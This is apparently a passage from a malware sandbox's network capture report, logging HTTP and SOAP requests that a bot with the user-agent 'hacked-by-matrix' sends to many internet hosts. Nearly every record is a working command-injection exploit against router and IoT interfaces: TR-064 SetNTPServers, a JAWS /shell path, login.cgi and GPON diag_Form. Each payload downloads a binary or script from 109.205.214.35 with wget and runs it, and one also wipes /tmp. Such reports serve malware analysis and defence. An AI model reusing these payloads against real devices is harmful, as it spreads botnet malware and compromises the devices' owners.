                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1383192.168.2.134403024.76.252.23980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.003736973 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:18.860234976 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:18.992693901 CET339INHTTP/1.0 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 05:41:12 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1384192.168.2.135981647.136.220.2187547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.055527925 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1385192.168.2.134433038.181.191.157547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.337718964 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:22.540261984 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:28.684318066 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:40.716537952 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1386192.168.2.134534861.71.243.757547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.365712881 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1387192.168.2.1337614179.113.22.517547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.561521053 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:18.789464951 CET240INHTTP/1.1 401 Unauthorized
                                                        Content-Length: 0
                                                        WWW-Authenticate: Digest realm="IgdAuthentication", domain="/", nonce="NThmMTgxOWU6N2MyZTVjZjg6OTFlN2RlNDQ=", qop="auth", algorithm=MD5, opaque="5ccc09c403ebaf9f0171e9517f40e41"
                                                        Mar 21, 2024 05:23:19.458005905 CET240INHTTP/1.1 401 Unauthorized
                                                        Content-Length: 0
                                                        WWW-Authenticate: Digest realm="IgdAuthentication", domain="/", nonce="NThmMTgxOWU6N2MyZTVjZjg6OTFlN2RlNDQ=", qop="auth", algorithm=MD5, opaque="5ccc09c403ebaf9f0171e9517f40e41"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1388192.168.2.1345812115.19.239.847547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.632838964 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1389192.168.2.134690477.236.203.6280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.668024063 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:19.692231894 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:19.891952991 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1390192.168.2.1339274212.23.90.2180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.709897995 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1391192.168.2.134936642.154.229.214443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740560055 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1392192.168.2.1345910109.148.72.170443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740581989 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1393192.168.2.1354564109.106.251.85443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740717888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1394192.168.2.1343272212.18.43.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740725040 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1395192.168.2.1349374118.244.11.22443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740753889 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1396192.168.2.13460825.187.9.161443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740761995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1397192.168.2.13385285.242.90.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740761995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1398192.168.2.1353556118.109.226.70443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740777016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1399192.168.2.1349666212.240.152.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740823030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1400192.168.2.1349210109.130.227.234443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.740834951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1401192.168.2.1341070212.37.99.101443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741374016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1402192.168.2.1335948118.233.187.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741384983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
